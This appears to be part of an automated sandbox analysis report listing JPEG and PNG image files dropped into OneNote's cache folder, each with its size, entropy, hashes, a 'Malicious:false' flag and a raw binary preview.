                                                                                                  Preview:......JFIF.....H.H.....XExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&...........*.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006O.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):52945
                                                                                                  Entropy (8bit):7.6490972666456765
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
                                                                                                  MD5:AD003F032F32FAC4672D4CE237FA5C5B
                                                                                                  SHA1:AE234931B452F0D649D91291763B919CF350EA49
                                                                                                  SHA-256:ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
                                                                                                  SHA-512:ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k|...S..d.4.>.RW5z.$.i.)V.O....>o...c..*&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N*..|.4...80.#..e....t.J..ZQ.x|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006Q.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):25622
                                                                                                  Entropy (8bit):7.058784902089801
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
                                                                                                  MD5:F8CCFC24DEB1D991EBE085E1B2D7D9BF
                                                                                                  SHA1:AF76C22A765434AEDA134924C517C84107F4FED5
                                                                                                  SHA-256:7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
                                                                                                  SHA-512:818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q*.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..|..n.....6.*...f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf..*....z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.)*.e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006S.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):15740
                                                                                                  Entropy (8bit):6.0674556182683945
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
                                                                                                  MD5:FFA5EC40DC9A0FD10EB9E6355142D6A6
                                                                                                  SHA1:3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
                                                                                                  SHA-256:D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
                                                                                                  SHA-512:6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006U.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):55804
                                                                                                  Entropy (8bit):7.433623355028275
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
                                                                                                  MD5:4126992F65FE53D3E3E78F6B27FD49DC
                                                                                                  SHA1:BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
                                                                                                  SHA-256:3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
                                                                                                  SHA-512:624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.*a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[...*..t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000070.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):41893
                                                                                                  Entropy (8bit):7.52654558351485
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
                                                                                                  MD5:F25427EFECFEE786D5A9F630726DD140
                                                                                                  SHA1:BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
                                                                                                  SHA-256:5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
                                                                                                  SHA-512:B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ*.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[F*ly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000072.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14177
                                                                                                  Entropy (8bit):5.705782002886174
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
                                                                                                  MD5:7CDCE7EEBF795998DA6CAC11D363291C
                                                                                                  SHA1:183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
                                                                                                  SHA-256:DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
                                                                                                  SHA-512:560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E|....,iOyD|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000075.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):12654
                                                                                                  Entropy (8bit):7.745439197485533
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:JheN2cq6MLu6MLGu54cHeNzhcmhcDu53eNE3UPkhrxvu:Ji2Wix7fzVsbE3Zm
                                                                                                  MD5:4BCCCDBB4273ECEBE216C84930A8D0B2
                                                                                                  SHA1:FFBF617787E27BC94D9BAF89F2FE34A2BD42794B
                                                                                                  SHA-256:474F9A8C25D5E21192315397EA995B1E11E2C1608157C6E0277688091BFD136A
                                                                                                  SHA-512:DAD73A8C0E293B88685C0C71EF15E0DC95EE39B7FC9F849DE5D634173FD9FA0AF0AA96742D9E94BE03556AA4A817D5001C95A6736EAD5D5DF03661876785EB74
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....C....................................................................C.......................................................................i..............................................E.....................U....V...f..ASTc.......de.1Qq...!Rb....Ca."r.................................B....................b....Ra.....!Qc.....AS.1U.."C...2Bq...$#3%&.............?......3.....~......:..g..s"......:..g..s"..ic..Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. ..0...Q_..X..V5E~..c..X...@u...cTW...0...Q_..;.m.....@w...Q.+....*.4W...lUFh....v..._..wn...dW....y._..v..E~...*...@wn...dW....y._...v..U..@wn...d..{`;.|U.2g...*.3...:.0?ViN.z.@w...4.M.:m..`~..i7...q...I....J.`l...W..n..PQTiB...6....+..sj.*."...6....+..WA...x..A........(.N6`..AD.q.....'S...t.Q:.l.......f.]..N..0.. .u8..A........_W..Y...}.C...~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~.v..?U..^.r..}..Bep

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000077.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2695
                                                                                                  Entropy (8bit):7.434963358385164
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:N9YMsguOZgKAz2vcaQU4R8r4BU0/Rc4nbIQdsohw13ZmFLY6KsVvMdBL2mr:/hsEgNz2v5T/rQC67SoWniHK4EdBH
                                                                                                  MD5:B23DE98D5B4AFC269ED7EBFDDECE9716
                                                                                                  SHA1:10AF507A8079293A9AE0E3B96CF63A949B4588AA
                                                                                                  SHA-256:646586CB71742A2369A529876B41AF6A472C35CC508D1AE5D8395D55784814F2
                                                                                                  SHA-512:BBACBE205EC0A4F4E3AB7E2B1DEE36FCF087DDF77C7D18B53AEA4B15984A47C64E19F9B8D8FA568620619CEA0361D94FE7ABEA6E502EC6ECAEFE957F42ED7EE8
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......M....".......................................,.......................1....!ABQRq.2a."CbS.......................................................Qa1A............?....{............i........l..-D.q.~..|cS.S...R\..d.8,!.....]f$....Q..di.;~5......vj......MqCe..=.*.f^..=.}.Cm]qCd..s=..u.e..v..t'.,.....S.s..N...>.d4'.,..k...N...d..9....G...y....6J.Y.l.{Vf...^B..i.3.z....:5W#4@.S\fj.%..Mb.5.v.5......S.E..#.v.I.....I......m..H....D..|.Y|...W.Wf..o..U.0.E..@.T.....................................'.S../...Z......!J..1K..rI...T.f.>.+.N..o.....\..^u........e..q.qK.GXP..-...F8".;5J...]Y......j.a.,R.......J.N........z}<qu..J.)`.}X:..}.............B...[. ......,B.).b.......(Y.O....c\.o.e&.W.#Bo..N|..N8.#J.>1D.1..b.&....q.#..UT%,.d.....m&..^...VXA..b.nbTV~.....^........q..#./.I..=Q..=..Y.*.Ib...VZ+......Y.........'.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000079.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11040
                                                                                                  Entropy (8bit):7.929583162638891
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:u99+91V42ho91V42ho91V42ho91V4235z9pUkDCyixxo4PS6b8tEy3BcWWhhSy0b:ubKD4/D4/D4/D4uzX38u4PNYJ2zhhmb
                                                                                                  MD5:02775A1E41CF53AC771D820003903913
                                                                                                  SHA1:2951A94A05ECF65E86D44C3C663B9B44BAD2BC9D
                                                                                                  SHA-256:83245F217DEAE4A4143B565E13C045DBB32A9063E8C6B2E43BB15CD76C5F9219
                                                                                                  SHA-512:5A1FCC24BDD5EE16BC2C9BACF45BCECF35ED895EAC22D2C4EE99C1B7E79C8E8B9E5186E3D026BA08FF70E08113F0A88FBF5E61C57AF4F3EA9BA80CE9F33410E9
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....C....................................................................C.......................................................................v.E.............................................S..........................Aa..!12Qqw.....3568rv........".....4Btu.....#Rs.(W..bg.................................D.....................1..2.!4Aqrs....Qa......t..."3BRb....#.$S.Cc..............?...K/h._+.N6.-.a...5...;.r....,...0B.s(..zp..4.%r|q..E.Q^.../...C.R..?u.q8XN.>.e..:..gJ...._.n>.70G,..(........3b.&.5m...Q../...7Ie..k....e.l6..&..`Gt.P.Y^r...=..Y.e...N.B...O.#..J+........u.V;G.'.....V.]8..C.]..........E.....c..w&lX..f..\T.J?...F.,..m|..93........,.....+.R..WG...%.....(@.....p].iEz<.8.^...J.h.....a8P.1......(z..y~.........H.Z^.>..<.....L.k..IG...R.(.%..m....&u...B|.....@]ey.W.J...!d..R.8...[..>8....(.G......!.)X.....,'..F2.Z.t..Aw./..Z..#..i.kK.......b.i...qR.(....RE.............O.XP.#..(...9J..]...,.2.[w....KrW'...tY.......{~.:.+..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007B.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2268
                                                                                                  Entropy (8bit):7.384274251000273
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:N9YMn9H5gXlM26vroVXWxyNnl1LmLR+rn4FOeewGhDbby:/h9SlMdgm09ll8R2/rby
                                                                                                  MD5:09A7AE94AA8E517298A9618A13D6E0E2
                                                                                                  SHA1:FA5181A7414BA32F816BF0C4278EC20C615E8B1A
                                                                                                  SHA-256:3C68C7EE798E62A4A99C740153F3980D7DF029605C843410942C7F85E794823B
                                                                                                  SHA-512:074E9A2BE2039D0AFEAD360157550B934FABD0CB86B5AF476C1FBC885EE60331F5A68EAF70BF76E23C8248A20FB900346839F4AA8892370B5889E64948DCC6E2
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........i..".......................................3......................!.A..1Q."q.2BRa.b...#$................................... .......................!12AqQ.............?..D.z.4....;.....7...3.t<!..d.O.....+O+.;.z6.4cz7E.........U.Z)-..@..y...........}(W...<.xv/...5.ew......yN....n.Tk.Tm.Ty.vA=...T..U....h...e.8.5%....'......e^......L.g.$.~e..O.._...... .F`.....xnL.<.......]jfv...}..\G..c.......-%...#.C.|.].`..^..W..c..B..5D.QSTaZ.5A=....BU..z%.4.h.6..=..U...W.$..l...7.:...........IPQT_...~..i..x....~.l.|.n.J..TV.21.Tg.....................j.z!+.-............"j.j...)*..TT...."....T.Tc.**j..............j.z!*.h...&.&.&..e.%..TksTW%G.?".l+$..c._9..[x...TU..........i~X..#'.qm?ttO.....}*.i...q.....9..r..?..W..d.w...f;..q...tZh..0.....2.......OD%Q-.......$......56.K.O...y._..*_C.k..p9.p..O..vu...'........0v

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007C.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):784
                                                                                                  Entropy (8bit):6.962539208465222
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:869YM8fij0W/xfuCp7ovv1bidiMn3bGi6AETQcdH8SADjoZgV6v9jUEvS3/g:N9YMWeI424diMn3yinsQeHvADu9QEvJ
                                                                                                  MD5:14105A831FE32590E52C2E2E41879624
                                                                                                  SHA1:078FA63FC7DB5830E9059DF02D56882240429D90
                                                                                                  SHA-256:D0A3A1C3CD63C4023FE5716CBE2C211307D0E277E444D9EF76C7FC097A845FD4
                                                                                                  SHA-512:8FC0ED24E8EC14C46EA523D9265DE28F85C5FC57AA54AD5B9CA162E95F79221E2AD3DD67D1293CF756B67F3D3DECAE122254134EA8D4D00DDED02114B5383947
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......a.L..".......................................-........................!A."1.Qbq....2Ba.........................................................1............?.....3.Ty\......vs....>.>..a.W..s89.d...Z}......rz...`...Z.r.do....u.W.%....gf.>.L..xz....B8=w...g.~g."HD...$..IKJ......nn..*ly..I....L...\q...Q;6.KrxZ.,...j$..ZQ..)f...q`.*..C1..cZ2]-..\.~..J.....^..(.f..9m?..C.NI.UL..X.fy.Z.........+n....r."Z...d..R./\.#...kd.D.5.!...h.3*s-+.......Xjt..}i..rK..y.../>u..]N.....Y..J......1.x./.....F6.......I...._3...k.sM.+..v;.%|.f.~.......:y....S....UKovh...W'........lF... .................

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007E.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3009
                                                                                                  Entropy (8bit):7.493528353751471
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:aRCTf+0hagMrbAZMJShPdvF/5OzlQFlDF7npkDdWvVBTEnBLT6NrgCX0:D+0YgMrApL553JtEdEVcL2NcX
                                                                                                  MD5:D9BD80D40B458EDB2A318F639561579A
                                                                                                  SHA1:83BA01519F3C7C1525C2EA4C2D9B40F28B2F2E5E
                                                                                                  SHA-256:509A6945FACFB3DDC7BE6EE8B82797AD0C72DB5755486EE878125A959CC09B59
                                                                                                  SHA-512:C368499667028180A922DD015980C29865AEF4A890C83E87AE29F6A27DC323DD729E6FB1C34A2168A148E6A7A972F65A5FC8ACE6981AF1D4E7057D99681CB366
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666........_.........................................:.......................r.!12BQ...3Aaq.."CRb.....#4$c.S.....................................................1A............?..p..-.....u0$.......l......)..o.FTd..DG....... .t*e..jO..Z.U......r..j.O.,..VD./.....V5D.&......A..Zi....E.N....*..........#..M<|.2.Y.../QO.x.cTM4......+.F;V.x.de*....]e..O.x.c\Y........r..j.O.,..T...hw..k.^.[B..J.sEl.w.x.m.5%zzt0..T.......b..<\.3Q..W</..!.xh6..Z..\.+M.o.Y..1............#.........|.a.l.KR>..U......e....@...\.1Z...Y...[....F.6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....Uh....FkYm.m`P...W .V.g..FjVj.\..1Q6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007F.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2266
                                                                                                  Entropy (8bit):5.563021222358941
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:TuRCTP9rSTfIEe1HbcVY1YbDXq8eCI0bf2QQe0GVDQAzZw:aRCTN7HbcW1YbDXq+I07Ien0AVw
                                                                                                  MD5:DB8A181E3F0EAD4A9472099E42ED6BE3
                                                                                                  SHA1:92096AF05CC6167B1AA816811A1160B809393FA2
                                                                                                  SHA-256:E9746B4E9AE9CE7B3B0068779DB3E113E2DFC9880F25373D745D0E700E69A906
                                                                                                  SHA-512:A9E246E10E28D057090BA9F034ECE6131780D7F794C5C9421523388997C7EDFBB49BC32B863B6C6668911B359C304AA54969B48CB9234950D5CECD2A6F3EFFF8
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666......r...........................................5.......................!1AQ..2a...."Rq..#3BSr..C..................................................................?...X.....U...j...F.W.V]'KV.uWt.iT...{.......`.(.....V%..=.....z......V..ct+.U.B...@.............................................{.....5.........0...x4....c..;...........+......|.7E.%.9.1+}..d.........+.V#.P.HUL.E...g.li...8.>U.";0pi.]5.\..zo..."@.........................................y.6.mLN..S.....@...i..A..p.......~|V9.+.Xy.........+,L.....7Z7..p...-X...\.....:-...i....v.1...-..H....9.zk....l....^.......:.."^.t.Q.F...X..B..$............................................a.%f&3..1.5+.X..'b7bwr.).e.x....!...H...aa_..kD...b..g..p..K^.k..qX.[,.........Q...U..x...YMvj...w..:k.....j.W.8..4....c.u.}m.....o.=@.......j.S.t.|.....5h.y.%.~...G

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007H.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):99293
                                                                                                  Entropy (8bit):7.9690121496708555
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:Moq1jVORV5NO5xLCBaaNk4vhpCr1CH/DATOQlWvHMHojiaAMrxArLFRZPj19AWFz:eVEbouBaIk4T8uDGOQlVHvaAMkhDh95V
                                                                                                  MD5:EA45266A770EEA27A24A5BB3BE688B14
                                                                                                  SHA1:9F0B23B3C8EBA4FC3C521E875EF876FBE018F3C8
                                                                                                  SHA-256:EDAD0F03E6FF99FEF9EF8E8B834CE74F26CD23C5F8C067F5CEE66F304181E64D
                                                                                                  SHA-512:D4EE36BDA897BBD643A699A0332DD00DE9CDCC6F46D861789BAD259A4BF87868AE3B4CFAAB6DFAF29941C7055B77A95D76BAA86A4A0DB2BF3BAF7E3317F03EB9
                                                                                                  Malicious:false
